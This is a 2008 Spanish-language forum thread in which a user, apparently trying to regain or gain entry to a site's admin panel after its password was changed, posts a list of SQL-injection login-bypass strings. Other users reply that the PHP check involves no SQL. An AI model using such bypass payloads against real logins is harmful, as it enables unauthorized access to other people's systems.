|
Título: Inyeccion Login en PHP Publicado por: gnesisxxi en 25 Noviembre 2008, 17:21 pm Señores, estuve mirando y probando pero todavia no pude dar.
Este es el codigo de la pagina: $idEditor=admin; if ($idEditor != '' AND $masterPwd == 'passworddesconocido') { Es el login al panel administrador de un site: Conozco el codigo porque tenia un backup, pero cambiaron el password. Que inyeccion creerian que puede servir para este caso??? Ya he probado estos: admin'-- ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ') or ('x'='x ' or 1=1-- " or 1=1-- or 1=1-- ' or a=a-- " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a Si alguin se anima. Saludos. Título: Re: Test (en inyeccion Login sql) Publicado por: Azielito en 25 Noviembre 2008, 20:40 pm podrias poner todo el codigo del SQL y del PHP? es que no entiendo esa linea que has puesto, pero al parecer no puedes hacer SQLinjection por no usa SQL para hacer login xD
Título: Re: Test (en inyeccion Login sql) Publicado por: perverthso en 25 Noviembre 2008, 21:26 pm en primero lugar creo deberias averiguar si puedes hacer todo eso osea si tiene alguna directiva de filtrado activado como el magic_quotes activado porq si es asi anda de loq estas ponendo sirve ×× luego ya ve q codigo puedes injectarle no lo hagas asi analiza el codigo bueno saludos
Título: Re: Test (en inyeccion Login sql) Publicado por: s E t H en 28 Noviembre 2008, 18:46 pm eso que pusiste hace la comparacion directamente en php, como no usa sql no se puede hacer sql injection
Título: Re: Inyeccion Login en PHP Publicado por: sirdarckcat en 3 Diciembre 2008, 08:55 am Que inyeccion creerian que puede servir para este caso??? ->eso que pusiste hace la comparacion directamente en php, como no usa sql no se puede hacer sql injection ++:xD jajaja |